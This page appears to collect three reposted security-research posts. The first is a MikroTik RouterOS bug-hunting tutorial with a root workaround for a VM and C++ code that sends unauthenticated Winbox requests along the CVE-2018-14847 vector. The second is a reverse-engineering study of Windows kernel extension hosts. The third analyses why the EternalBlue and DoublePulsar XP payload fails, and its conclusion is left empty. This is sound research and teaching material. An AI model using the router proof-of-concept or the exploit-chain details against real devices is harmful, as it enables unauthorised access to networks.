Make It Rain with MikroTik

Original text by Jacob Baines

Can you hear me in the… front?

I came into work to find an unusually high number of private Slack messages. They all pointed to the same tweet.

Why would this matter to me? I gave a talk at Derbycon about hunting for bugs in MikroTik’s RouterOS. I had a 9am Sunday time slot.

You don’t want a 9am Sunday time slot at Derbycon

Now that Zerodium is paying out six figures for MikroTik vulnerabilities, I figured it was a good time to finally put some of my RouterOS bug hunting into writing. Really, any time is a good time to investigate RouterOS. It’s a fun target. Hell, just preparing this write up I found a new unauthenticated vulnerability. You could too.


Laying the Groundwork

Now I know you’re already looking up Rolex prices, but calm down, Sparky. You still have work to do. Even if you’re just planning to download a simple fuzzer and pray for a pay day, you’ll still need to read this first section.

Acquiring Software

You don’t have to rush to Amazon to acquire a router. MikroTik makes RouterOS ISOs available on their website. The ISO can be used to create a virtual host with VirtualBox or VMWare.

Naturally, Mikrotik published 6.42.12 the day I published this blog

You can also extract the system files from the ISO.

albinolobster@ubuntu:~/6.42.11$ 7z x mikrotik-6.42.11.iso
7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,4 CPUs)
Processing archive: mikrotik-6.42.11.iso
Extracting  advanced-tools-6.42.11.npk
Extracting calea-6.42.11.npk
Extracting defpacks
Extracting dhcp-6.42.11.npk
Extracting dude-6.42.11.npk
Extracting gps-6.42.11.npk
Extracting hotspot-6.42.11.npk
Extracting ipv6-6.42.11.npk
Extracting isolinux
Extracting isolinux/boot.cat
Extracting isolinux/initrd.rgz
Extracting isolinux/isolinux.bin
Extracting isolinux/isolinux.cfg
Extracting isolinux/linux
Extracting isolinux/TRANS.TBL
Extracting kvm-6.42.11.npk
Extracting lcd-6.42.11.npk
Extracting LICENSE.txt
Extracting mpls-6.42.11.npk
Extracting multicast-6.42.11.npk
Extracting ntp-6.42.11.npk
Extracting ppp-6.42.11.npk
Extracting routing-6.42.11.npk
Extracting security-6.42.11.npk
Extracting system-6.42.11.npk
Extracting TRANS.TBL
Extracting ups-6.42.11.npk
Extracting user-manager-6.42.11.npk
Extracting wireless-6.42.11.npk
Extracting [BOOT]/Bootable_NoEmulation.img
Everything is Ok
Folders: 1
Files: 29
Size: 26232176
Compressed: 26335232

MikroTik packages a lot of their software in their custom .npk format. There’s a tool that’ll unpack these, but I prefer to just use binwalk.

albinolobster@ubuntu:~/6.42.11$ binwalk -e system-6.42.11.npk
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------
0 0x0 NPK firmware header, image size: 15616295, image name: "system", description: ""
4096 0x1000 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 9818075 bytes, 1340 inodes, blocksize: 262144 bytes, created: 2018-12-21 09:18:10
9822304 0x95E060 ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)
9842177 0x962E01 Unix path: /sys/devices/system/cpu
9846974 0x9640BE ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)
9904147 0x972013 Unix path: /sys/devices/system/cpu
9928025 0x977D59 Copyright string: "Copyright 1995-2005 Mark Adler "
9928138 0x977DCA CRC32 polynomial table, little endian
9932234 0x978DCA CRC32 polynomial table, big endian
9958962 0x97F632 xz compressed data
12000822 0xB71E36 xz compressed data
12003148 0xB7274C xz compressed data
12104110 0xB8B1AE xz compressed data
13772462 0xD226AE xz compressed data
13790464 0xD26D00 xz compressed data
15613512 0xEE3E48 xz compressed data
15616031 0xEE481F Unix path: /var/pdb/system/crcbin/milo 3801732988
albinolobster@ubuntu:~/6.42.11$ ls -o ./_system-6.42.11.npk.extracted/squashfs-root/
total 64
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 bin
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 boot
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 dev
lrwxrwxrwx 1 albinolobster 11 Dec 21 04:18 dude -> /flash/dude
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:18 etc
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 flash
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:17 home
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 initrd
drwxr-xr-x 4 albinolobster 4096 Dec 21 04:18 lib
drwxr-xr-x 5 albinolobster 4096 Dec 21 04:18 nova
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:18 old
lrwxrwxrwx 1 albinolobster 9 Dec 21 04:18 pckg -> /ram/pckg
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 proc
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 ram
lrwxrwxrwx 1 albinolobster 9 Dec 21 04:18 rw -> /flash/rw
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 sbin
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 sys
lrwxrwxrwx 1 albinolobster 7 Dec 21 04:18 tmp -> /rw/tmp
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:17 usr
drwxr-xr-x 5 albinolobster 4096 Dec 21 04:18 var
albinolobster@ubuntu:~/6.42.11$

Hack the Box

When looking for vulnerabilities it’s helpful to have access to the target’s filesystem. It’s also nice to be able to run tools, like GDB, locally. However, the shell that RouterOS offers isn’t a normal unix shell. It’s just a command line interface for RouterOS commands.

Who am I?!

Fortunately, I have a work around that will get us root. RouterOS will execute anything stored in the /rw/DEFCONF file due the way the rc.d script S12defconf is written.

Friends don’t let friends use eval

A normal user has no access to that file, but thanks to the magic of VMs and Live CDs you can create the file and insert any commands you want. The exact process takes too many words to explain. Instead I made a video. The screen recording is five minutes long and it goes from VM installation all the way through root telnet access.

With root telnet access you have full control of the VM. You can upload more tooling, attach to processes, watch logs, etc. You’re now ready to explore the router’s attack surface.


Is Anyone Listening?

You can quickly determine the network reachable attack surface thanks to the ps command.

Looks like the router listens on some well known ports (HTTP, FTP, Telnet, and SSH), but also some lesser known ports. btest on port 2000 is the bandwidth-test server. mproxy on 8291 is the service that WinBox interfaces with. WinBox is an administrative tool that runs on Windows. It shares all the same functionality as the Telnet, SSH, and HTTP interfaces.

Hello, I load .dll straight off the router. Yes, that has been a problem. Why do you ask?

The Real Attack Surface

The ps output makes it appear as if there are only a few binaries to bug hunt in. But nothing could be further from the truth. Both the HTTP server and Winbox speak a custom protocol that I’ll refer to as WinboxMessage (the actual code calls it nv::message). The protocol specifies which binary a message should be routed to. In truth, with all packages installed, there are about 90 different network reachable binaries that use the WinboxMessage protocol.

There’s also an easy way to figure out which binaries I’m referring to. A list can be found in each package’s /nova/etc/loader/*.x3 file. x3 is a custom file format so I wrote a parser. The example output goes on for a while so I snipped it a bit.

albinolobster@ubuntu:~/routeros/parse_x3/build$ ./x3_parse -f ~/6.42.11/_system-6.42.11.npk.extracted/squashfs-root/nova/etc/loader/system.x3 
/nova/bin/log,3
/nova/bin/radius,5
/nova/bin/moduler,6
/nova/bin/user,13
/nova/bin/resolver,14
/nova/bin/mactel,15
/nova/bin/undo,17
/nova/bin/macping,18
/nova/bin/cerm,19
/nova/bin/cerm-worker,75
/nova/bin/net,20
...

The x3 file also contains each binary’s “SYS TO” identifier. This is the identifier that the WinboxMessage protocol uses to determine where a message should be handled.


Me Talk WinboxMessage Pretty One Day

Knowing which binaries you should be able to reach is useful, but actually knowing how to communicate with them is quite a bit more important. In this section, I’ll walk through a couple of examples.

Getting Started

Let’s say I want to talk to /nova/bin/undo. Where do I start? Let’s start with some code. I’ve written a bunch of C++ that will do all of the WinboxMessage protocol formatting and session handling. I’ve also created a skeleton programthat you can build off of. main is pretty bare.

std::string ip;
std::string port;
if (!parseCommandLine(p_argc, p_argv, ip, port))
{
return EXIT_FAILURE;
}
Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
std::cerr << "Failed to connect to the remote host"
<< std::endl;
return EXIT_FAILURE;
}
return EXIT_SUCCESS;

You can see the Winbox_Session class is responsible for connecting to the router. It’s also responsible for authentication logic as well as sending and receiving messages.

Now, from the output above, you know that /nova/bin/undo has a SYS TO identifier of 17. In order to reach undo, you need to update the code to create a message and set the appropriate SYS TO identifier (the new part is bolded).

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
std::cerr << "Failed to connect to the remote host"
<< std::endl;
return EXIT_FAILURE;
}
WinboxMessage msg;
msg.set_to(17);

Command and Control

Each message also requires a command. As you’ll see in a little bit, each command will invoke specific functionality. There are some builtin commands (0xfe0000–0xfe00016) used by all handlers and some custom commands that have unique implementations.

Pop /nova/bin/undo into a disassembler and find the nv::Looper::Looperconstructor’s only code cross reference.

Follow the offset to vtable that I’ve labeled undo_handler and you should see the following.

This is the vtable for undo’s WinboxMessage handling. A bunch of the functions directly correspond to the builtin commands I mentioned earlier (e.g. 0xfe0001 is handled by nv::Handler::cmdGetPolicies). You can also see I’ve highlighted the unknown command function. Non-builtin commands get implemented there.

Since the non-builtin commands are usually the most interesting, you’re going to jump into cmdUnknown. You can see it starts with a command based jump table.

It looks like the commands start at 0x80001. Looking through the code a bit, command 0x80002 appears to have a useful string to test against. Let’s see if you can reach the “nothing to redo” code path.

You need to update the skeleton code to request command 0x80002. You’ll also need to add in the send and receive logic. I’ve bolded the new part.

WinboxMessage msg;
msg.set_to(17);
msg.set_command(0x80002);
msg.set_request_id(1);
msg.set_reply_expected(true);
winboxSession.send(msg);
std::cout << "req: " << msg.serialize_to_json() << std::endl;
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return EXIT_FAILURE;
}
std::cout << "resp: " << msg.serialize_to_json() << std::endl;

if (msg.has_error())
{
std::cerr << msg.get_error_string() << std::endl;
return EXIT_FAILURE;
}
return EXIT_SUCCESS;

After compiling and executing the skeleton you should get the expected, “nothing to redo.”

albinolobster@ubuntu:~/routeros/poc/skeleton/build$ ./skeleton -i 10.0.0.104 -p 8291
req: {bff0005:1,uff0006:1,uff0007:524290,Uff0001:[17]}
resp: {uff0003:2,uff0004:2,uff0006:1,uff0008:16646150,sff0009:'nothing to redo',Uff0001:[],Uff0002:[17]}
nothing to redo
albinolobster@ubuntu:~/routeros/poc/skeleton/build$

There’s Rarely Just One

In the previous example, you looked at the main handler in undo which was addressable simply as 17. However, the majority of binaries have multiple handlers. In the following example, you’ll examine /nova/bin/mproxy’s handler #2. I like this example because it’s the vector for CVE-2018–14847and it helps demystify these weird binary blobs:

My exploit for CVE-2018–14847 delivers a root shell. Just sayin’.

Hunting for Handlers

Open /nova/bin/mproxy in IDA and find the nv::Looper::addHandler import. In 6.42.11, there are only two code cross references to addHandler. It’s easy to identify the handler you’re interested in, handler 2, because the handler identifier is pushed onto the stack right before addHandler is called.

If you look up to where nv::Handler* is loaded into edi then you’ll find the offset for the handler’s vtable. This structure should look very familiar:

Again, I’ve highlighted the unknown command function. The unknown command function for this handler supports seven commands:

  1. Opens a file in /var/pckg/ for writing.
  2. Writes to the open file.
  3. Opens a file in /var/pckg/ for reading.
  4. Reads the open file.
  5. Cancels a file transfer.
  6. Creates a directory in /var/pckg/.
  7. Opens a file in /home/web/webfig/ for reading.

Commands 4, 5, and 7 do not require authentication.

Open a File

Let’s try to open a file in /home/web/webfig/ with command 7. This is the command that the FIRST_PAYLOAD in the exploit-db screenshot uses. If you look at the handling of command 7 in the code, you’ll see the first thing it looks for is a string with the id of 1.

The string is the filename you want to open. What file in /home/web/webfig is interesting?

The real answer is “none of them” look interesting. But list contains a list of the installed packages and their version numbers.

Let’s translate the open file request into WinboxMessage. Returning to the skeleton program, you’ll want to overwrite the set_to and set_commandcode. You’ll also want to insert the add_string. I’ve bolded the new portion again.

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
std::cerr << "Failed to connect to the remote host"
<< std::endl;
return EXIT_FAILURE;
}
WinboxMessage msg;
msg.set_to(2,2); // mproxy, second handler
msg.set_command(7);
msg.add_string(1, "list"); // the file to open

msg.set_request_id(1);
msg.set_reply_expected(true);
winboxSession.send(msg);
std::cout << "req: " << msg.serialize_to_json() << std::endl;
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return EXIT_FAILURE;
}
std::cout << "resp: " << msg.serialize_to_json() << std::endl;

When running this code you should see something like this:

albinolobster@ubuntu:~/routeros/poc/skeleton/build$ ./skeleton -i 10.0.0.104 -p 8291
req: {bff0005:1,uff0006:1,uff0007:7,s1:'list',Uff0001:[2,2]}
resp: {u2:1818,ufe0001:3,uff0003:2,uff0006:1,Uff0001:[],Uff0002:[2,2]}
albinolobster@ubuntu:~/routeros/poc/skeleton/build$

You can see the response from the server contains u2:1818. Look familiar?

1818 is the size of the list

As this is running quite long, I’ll leave the exercise of reading the file’s content up to the reader. This very simple CVE-2018–14847 proof of concept contains all the hints you’ll need.

Conclusion

I’ve shown you how to get the RouterOS software and root a VM. I’ve shown you the attack surface and taught you how to navigate the system binaries. I’ve given you a library to handle Winbox communication and shown you how to use it. If you want to go deeper and nerd out on protocol minutiae then check out my talk. Otherwise, you now know enough to be dangerous.

Good luck and happy hacking!

Реклама

Yes, More Callbacks — The Kernel Extension Mechanism

Original text by Yarden Shafir

Recently I had to write a kernel-mode driver. This has made a lot of people very angry and been widely regarded as a bad move. (Douglas Adams, paraphrased)

Like any other piece of code written by me, this driver had several major bugs which caused some interesting side effects. Specifically, it prevented some other drivers from loading properly and caused the system to crash.

As it turns out, many drivers assume their initialization routine (DriverEntry) is always successful, and don’t take it well when this assumption breaks. j00rudocumented some of these cases a few years ago in his blog, and many of them are still relevant in current Windows versions. However, these buggy drivers are not really the issue here, and j00ru covered it better than I could anyway. Instead I focused on just one of these drivers, which caught my attention and dragged me into researching the so-called “windows kernel host extensions” mechanism.

The lucky driver is Bam.sys (Background Activity Moderator) — a new driver which was introduced in Windows 10 version 1709 (RS3). When its DriverEntry fails mid-way, the call stack leading to the system crash looks like this:

From this crash dump, we can see that Bam.sys registered a process creation callback and forgot to unregister it before unloading. Then, when a process was created / terminated, the system tried to call this callback, encountered a stale pointer and crashed.

The interesting thing here is not the crash itself, but rather how Bam.sys registers this callback. Normally, process creation callbacks are registered via nt!PsSetCreateProcessNotifyRoutine(Ex), which adds the callback to the nt!PspCreateProcessNotifyRoutine array. Then, whenever a process is being created or terminated, nt!PspCallProcessNotifyRoutines iterates over this array and calls all of the registered callbacks. However, if we run for example “!wdbgark.wa_systemcb /type process“ in WinDbg, we’ll see that the callback used by Bam.sys is not found in this array.

Instead, Bam.sys uses a whole other mechanism to register its callbacks.

If we take a look at nt!PspCallProcessNotifyRoutines, we can see an explicit reference to some variable named nt!PspBamExtensionHost (there is a similar one referring to the Dam.sys driver). It retrieves a so-called “extension table” using this “extension host” and calls the first function in the extension table, which is bam!BampCreateProcessCallback.

If we open Bam.sys in IDA, we can easily find bam!BampCreateProcessCallbackand search for its xrefs. Conveniently, it only has one, in bam!BampRegisterKernelExtension:

As suspected, Bam!BampCreateProcessCallback is not registered via the normal callback registration mechanism. It is actually being stored in a function table named Bam!BampKernelCalloutTable, which is later being passed, together with some other parameters (we’ll talk about them in a minute) to the undocumented nt!ExRegisterExtension function.

I tried to search for any documentation or hints for what this function was responsible for, or what this “extension” is, and couldn’t find much. The only useful resource I found was the leaked ntosifs.h header file, which contains the prototype for nt!ExRegisterExtension as well as the layout of the _EX_EXTENSION_REGISTRATION_1 structure.

Prototype for nt!ExRegisterExtension and _EX_EXTENSION_REGISTRATION_1, as supplied in ntosifs.h:

NTKERNELAPI NTSTATUS ExRegisterExtension (
    _Outptr_ PEX_EXTENSION *Extension,
    _In_ ULONG RegistrationVersion,
    _In_ PVOID RegistrationInfo
);

typedef struct _EX_EXTENSION_REGISTRATION_1 {
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    VOID *FunctionTable;
    PVOID *HostInterface;
    PVOID DriverObject;
} EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

After a bit of reverse engineering, I figured that the formal input parameter “PVOID RegistrationInfo” is actually of type PEX_EXTENSION_REGISTRATION_1.

The pseudo-code of nt!ExRegisterExtension is shown in appendix B, but here are the main points:

  1. nt!ExRegisterExtension extracts the ExtensionId and ExtensionVersion members of the RegistrationInfo structure and uses them to locate a matching host in nt!ExpHostList (using the nt!ExpFindHost function, whose pseudo-code appears in appendix B).
  2. Then, the function verifies that the amount of functions supplied in RegistrationInfo->FunctionCount matches the expected amount set in the host’s structure. It also makes sure that the host’s FunctionTable field has not already been initialized. Basically, this check means that an extension cannot be registered twice.
  3. If everything seems OK, the host’s FunctionTable field is set to point to the FunctionTable supplied in RegistrationInfo.
  4. Additionally, RegistrationInfo->HostInterface is set to point to some data found in the host structure. This data is interesting, and we’ll discuss it soon.
  5. Eventually, the fully initialized host is returned to the caller via an output parameter.

We saw that nt!ExRegisterExtension searches for a host that matches RegistrationInfo. The question now is, where do these hosts come from?

  • During its initialization, NTOS performs several calls to nt!ExRegisterHost. In every call it passes a structure identifying a single driver from a list of predetermined drivers (full list in appendix A). For example, here is the call which initializes a host for Bam.sys:
  • nt!ExRegisterHost allocates a structure of type _HOST_LIST_ENTRY(unofficial name, coined by me), initializes it with data supplied by the caller, and adds it to the end of nt!ExpHostList. The _HOST_LIST_ENTRYstructure is undocumented, and looks something like this:
struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount; // number of callbacks that the extension 
// contains
    POOL_TYPE PoolType;   // where this host is allocated
    PVOID HostInterface; // table of unexported nt functions, 
// to be used by the driver to which
// this extension belongs
    PVOID FunctionAddress; // optional, rarely used. 
// This callback is called before
// and after an extension for this
// host is registered / unregistered
    PVOID ArgForFunction; // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable; // a table of the callbacks that the 
// driver “registers”
    DWORD Flags;         // Only uses one bit. 
// Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;
  • When one of the predetermined drivers loads, it registers an extension using nt!ExRegisterExtension and supplies a RegistrationInfo structure, containing a table of functions (as we saw Bam.sys doing). This table of functions will be placed in the FunctionTable member of the matching host. These functions will be called by NTOS in certain occasions, which makes them some kind of callbacks.

Earlier we saw that part of nt!ExRegisterExtension functionality is to set RegistrationInfo->HostInterface (which contains a global variable in the calling driver) to point to some data found in the host structure. Let’s get back to that.

Every driver which registers an extension has a host initialized for it by NTOS. This host contains, among other things, a HostInterface, pointing to a predetermined table of unexported NTOS functions. Different drivers receive different HostInterfaces, and some don’t receive one at all.

For example, this is the HostInterface that Bam.sys receives:

So the “kernel extensions” mechanism is actually a bi-directional communication port: The driver supplies a list of “callbacks”, to be called on different occasions, and receives a set of functions for its own internal use.

To stick with the example of Bam.sys, let’s take a look at the callbacks that it supplies:

  • BampCreateProcessCallback
  • BampSetThrottleStateCallback
  • BampGetThrottleStateCallback
  • BampSetUserSettings
  • BampGetUserSettingsHandle

The host initialized for Bam.sys “knows” in advance that it should receive a table of 5 functions. These functions must be laid-out in the exact order presented here, since they are called according to their index. As we can see in this case, where the function found in nt!PspBamExtensionHost->FunctionTable[4] is called:

To conclude, there exists a mechanism to “extend” NTOS by means of registering specific callbacks and retrieving unexported functions to be used by certain predetermined drivers.

I don’t know if there is any practical use for this knowledge, but I thought it was interesting enough to share. If you find anything useful / interesting to do with this mechanism, I’d love to know 🙂


Appendix A — Extension hosts initialized by NTOS:


Appendix B — functions pseudo-code:

NTSTATUS ExRegisterExtension(_Outptr_ PEX_EXTENSION *Extension, _In_ ULONG RegistrationVersion, _In_ PREGISTRATION_INFO RegistrationInfo)
{
	// Validate that version is ok and that FunctionTable is not sent without FunctionCount or vise-versa.
	if ( (RegistrationVersion & 0xFFFF0000 != 0x10000) || (RegistrationInfo->FunctionTable == nullptr && RegistrationInfo->FunctionCount != 0) ) 
	{ 
		return STATUS_INVALID_PARAMETER; 
	}

	// Skipping over some lock-related stuff,
	
	// Find the host with the matching version and id.
	PHOST_LIST_ENTRY pHostListEntry;
	pHostListEntry = ExpFindHost(RegistrationInfo->ExtensionId, RegistrationInfo->ExtensionVersion);

	// More lock-related stuff.	

	if (!pHostListEntry)
	{
		return STATUS_NOT_FOUND;
	}

	// Verify that the FunctionCount in the host doesn't exceed the FunctionCount supplied by the caller.
	if (RegistrationInfo->FunctionCount < pHostListEntry->FunctionCount)
	{
		ExpDereferenceHost(pHostListEntry);
		return STATUS_INVALID_PARAMETER;
	}

	// Check that the number of functions in FunctionTable matches the amount in FunctionCount.
	PVOID FunctionTable = RegistrationInfo->FunctionTable;
	for (int i = 0; i < RegistrationInfo->FunctionCount; i++)
	{	
		if ( RegistrationInfo->FunctionTable[i] == nullptr ) 
		{ 
			ExpDereferenceHost(pHostListEntry);
			return STATUS_ACCESS_DENIED; 
		}
	}

	// skipping over some more lock-related stuff

	// Check if there is already an extension registered for this host.
	if (pHostListEntry->FunctionTable != nullptr || FlagOn(pHostListEntry->Flags, 1) )
	{
		// There is something related to locks here
		ExpDereferenceHost(pHostListEntry);
		return STATUS_OBJECT_NAME_COLLISION;
	}

	// If there is a callback function for this host, call it before registering the extension, with 0 as the first parameter.
	if (pHostListEntry->FunctionAddress) 
	{ 
		pHostListEntry->FunctionAddress(0, pHostListEntry->ArgForFunction); 
	}

	// Set the FunctionTable in the host to the table supplied by the caller, or to MmBadPointer if a table wasn't supplied.
	if (RegistrationInfo->FunctionTable == nullptr)
	{
		pHostListEntry->FunctionTable = nt!MmBadPointer;
	}
	else
	{
		pHostListEntry->FunctionTable = RegistrationInfo->FunctionTable;
	}

	pHostListEntry->RundownRef = 0;

	// If there is a callback function for this host, call it after registering the extension, with 1 as the first parameter.
	if (pHostListEntry->FunctionAddress)
	{
		pHostListEntry->FunctionAddress(1, pHostListEntry->ArgForFunction);
	}

	// Here there is some more lock-related stuff

	// Set the HostTable of the calling driver to the table of functions listed in the host.
	if (RegistrationInfo->HostTable != nullptr)
	{
		*(PVOID)RegistrationInfo->HostTable = pHostListEntry->hostInterface;
	}

	// Return the initialized host to the caller in the output Extension parameter.
	*Extension = pHostListEntry;
	return STATUS_SUCCESS;
}

ExRegisterExtension.c hosted with ❤ by GitHub

NTSTATUS ExRegisterHost(_Out_ PHOST_LIST_ENTRY ExtensionHost, _In_ ULONG Unused, _In_ PHOST_INFORMATION HostInformation)
{
	NTSTATUS Status = STATUS_SUCCESS;

	// Allocate memory for a new HOST_LIST_ENTRY
	PHOST_LIST_ENTRY p = ExAllocatePoolWithTag(HostInformation->PoolType, 0x60, 'HExE');
	if (p == nullptr)
	{
		return STATUS_INSUFFICIENT_RESOURCES;
	}

	//
	// Initialize a new HOST_LIST_ENTRY 
	//
	p->Flags &= 0xFE;
	p->RefCount = 1;
	p->FunctionTable = 0;
	p->ExtensionId = HostInformation->ExtensionId;
	p->ExtensionVersion = HostInformation->ExtensionVersion;
	p->hostInterface = HostInformation->hostInterface;
	p->FunctionAddress = HostInformation->FunctionAddress;
	p->ArgForFunction = HostInformation->ArgForFunction;			
	p->Lock = 0; 			
	p->RundownRef = 0;		

	// Search for an existing listEntry with the same version and id.
	PHOST_LIST_ENTRY listEntry = ExpFindHost(HostInformation->ExtensionId, HostInformation->ExtensionVersion);
	if (listEntry)
	{
		Status = STATUS_OBJECT_NAME_COLLISION;
		ExpDereferenceHost(p);
		ExpDereferenceHost(listEntry);
	}
	else
	{
		// Insert the new HOST_LIST_ENTRY to the end of ExpHostList.
		if ( *lastHostListEntry != &firstHostListEntry )
		{
	      	    __fastfail();
		}

		firstHostListEntry->Prev = &p;
		p->Next = firstHostListEntry;
		lastHostListEntry = p;

		ExtensionHost = p;
	}
	
	return Status;
}

ExRegisterHost.c hosted with ❤ by GitHub

PHOST_LIST_ENTRY ExpFindHost(USHORT ExtensionId, USHORT ExtensionVersion)
{
	PHOST_LIST_ENTRY entry;
	for (entry == ExpHostList; ; entry = entry->Next)
	{
		if (entry == &ExpHostList) 
		{ 
			return 0; 
		}
		
		if ( *(entry->ExtensionId) == ExtensionId && *(entry->ExtensionVersion) == ExtensionVersion ) 
		{ 
			break; 
		}
	}
	InterlockedIncrement(entry->RefCount);
	return entry;
}

ExpFindHost.c hosted with ❤ by GitHub

void ExpDereferenceHost(PHOST_LIST_ENTRY Host)
{
  	if ( InterlockedExchangeAdd(Host.RefCount, 0xFFFFFFFF) == 1 )
	{
    		ExFreePoolWithTag(Host, 0);
	}
}

ExpDereferenceHost.c hosted with ❤ by GitHub


Appendix C — structures definitions:

struct _HOST_INFORMATION
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    DWORD FunctionCount;
    POOL_TYPE PoolType;
    PVOID HostInterface;
    PVOID FunctionAddress;
    PVOID ArgForFunction;
    PVOID unk;
} HOST_INFORMATION, *PHOST_INFORMATION;

struct _HOST_LIST_ENTRY
{
    _LIST_ENTRY List;
    DWORD RefCount;
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount; // number of callbacks that the 
// extension contains
    POOL_TYPE PoolType;   // where this host is allocated
    PVOID HostInterface;  // table of unexported nt functions, 
// to be used by the driver to which
// this extension belongs
    PVOID FunctionAddress; // optional, rarely used. 
// This callback is called before and
// after an extension for this host
// is registered / unregistered
    PVOID ArgForFunction; // will be sent to the function saved here
    _EX_RUNDOWN_REF RundownRef;
    _EX_PUSH_LOCK Lock;
    PVOID FunctionTable;    // a table of the callbacks that 
// the driver “registers”
DWORD Flags;                // Only uses one flag. 
// Not sure about its meaning.
} HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;;

struct _EX_EXTENSION_REGISTRATION_1
{
    USHORT ExtensionId;
    USHORT ExtensionVersion;
    USHORT FunctionCount;
    PVOID FunctionTable;
    PVOID *HostTable;
    PVOID DriverObject;
}EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

Dissecting a Bug in the EternalBlue Client for Windows XP (FuzzBunch)

( Original text by zerosum0x0 )

 

Background

Pwning Windows 7 was no problem, but I would re-visit the EternalBlue exploit against Windows XP for a time and it never seemed to work. I tried all levels of patching and service packs, but the exploit would either always passively fail to work or blue-screen the machine. I moved on from it, because there was so much more of FuzzBunch that was unexplored.

Well, one day on a pentest a wild Windows XP appeared, and I figured I would give FuzzBunch a go. To my surprise, it worked! And on the first try.

Why did this exploit work in the wild but not against runs in my «lab»?

tl;dr: Differences in NT/HAL between single-core/multi-core/PAE CPU installs causes FuzzBunch’s XP payload to abort prematurely on single-core installs.

Multiple Exploit Chains

Keep in mind that there are several versions of EternalBlue. The Windows 7 kernel exploit has been well documented. There are also ports to Windows 10 which have been documented by myself and JennaMagius as well as sleepya_.

But FuzzBunch includes a completely different exploit chain for Windows XP, which cannot use the same basic primitives (i.e. SMB2 and SrvNet.sys do not exist yet!). I discussed this version in depth at DerbyCon 8.0 (slides / video).

tl;dw: The boot processor KPCR is static on Windows XP, and to gain shellcode execution the value of KPRCB.PROCESSOR_POWER_STATE.IdleFunction is overwritten.

Payload Methodology

As it turns out, the exploit was working just fine in the lab. What was failing was FuzzBunch’s payload.

The main stages of the ring 0 shellcode performs the following actions:

  1. Obtains &nt and &hal using the now-defunct KdVersionBlock trick
  2. Resolves some necessary function pointers, such as hal!HalInitializeProcessor
  3. Restores the boot processor KPCR/KPRCB which was corrupted during exploitation
  4. Runs DoublePulsar to backdoor the SMB service
  5. Gracefully resumes execution at a normal state (nt!PopProcessorIdle)

Single Core Branch Anomaly

Setting a couple hardware breakpoints on the IdleFunction switch and +0x170 into the shellcode (after a couple initial XOR/Base64 shellcode decoder stages), it is observed that a multi-core machine install branches differently than the single-core machine.

1 kd> ba w 1 ffdffc50 "ba e 1 poi(ffdffc50)+0x170;g;"

The multi-core machine has acquired a function pointer to hal!HalInitializeProcessor.

Presumably, this function will be called to clean up the semi-corrupted KPRCB.

The single-core machine did not find hal!HalInitializeProcessor… sub_547 instead returned NULL. The payload cannot continue, and will now self destruct by zeroing as much of itself out as it can and set up a ROP chain to free some memory and resume execution.

Note: A successful shellcode execution will perform this action as well, just after installing DoublePulsar first.

Root Cause Analysis

The shellcode function sub_547 does not properly find hal!HalInitializeProcessor on single core CPU installs, and thus the entire payload is forced to abruptly abort. We will need to reverse engineer the shellcode function to figure out exactly why the payload is failing.

There is an issue in the kernel shellcode that does not take into account all of the different types of the NT kernel executables are available for Windows XP. Specifically, the multi-core processor version of NT works fine (i.e. ntkrnlamp.exe), but a single core install (i.e. ntoskrnl.exe) will fail. Likewise, there is a similar difference in halmacpi.dll vs halacpi.dll.

The NT Red Herring

The first operation that sub_547 performs is to obtain HAL function imports used by the NT executive. It finds HAL functions by first reading at offset 0x1040 into NT.

On multi-core installs of Windows XP, this offset works as intended, and the shellcode finds hal!HalQueryRealTimeClock:

However, on single-core installations this is not a HAL import table, but instead a string table:

At first I figured this was probably the root cause. But it is a red herring, as there is correction code. The shellcode will check if the value at 0x1040 is an address in the range within HAL. If not it will subtract 0xc40 and start searching in increments of 0x40 for an address within the HAL range, until it reaches 0x1040 again.

Eventually, the single-core version will find a HAL function, this time hal!HalCalibratePerformanceCounter:

This all checks out and is fine, and shows that Equation Group did a good job here for determining different types of XP NT.

HAL Variation Byte Table

Now that a function within HAL has been found, the shellcode will attempt to locate hal!HalInitializeProcessor. It does so by carrying around a table (at shellcode offset 0x5e7) that contains a 1-byte length field followed by an expected sequence of bytes. The original discovered HAL function address is incremented in search of those bytes within the first 0x20 bytes of a new function.

The desired 5 bytes are easily found in the multi-core version of HAL:

However, the function on single-core HAL is much different.

There is a similar mov instruction, but it is not a movzx. The byte sequence being searched for is not present in this function, and consequently the function is not discovered.

Conclusion

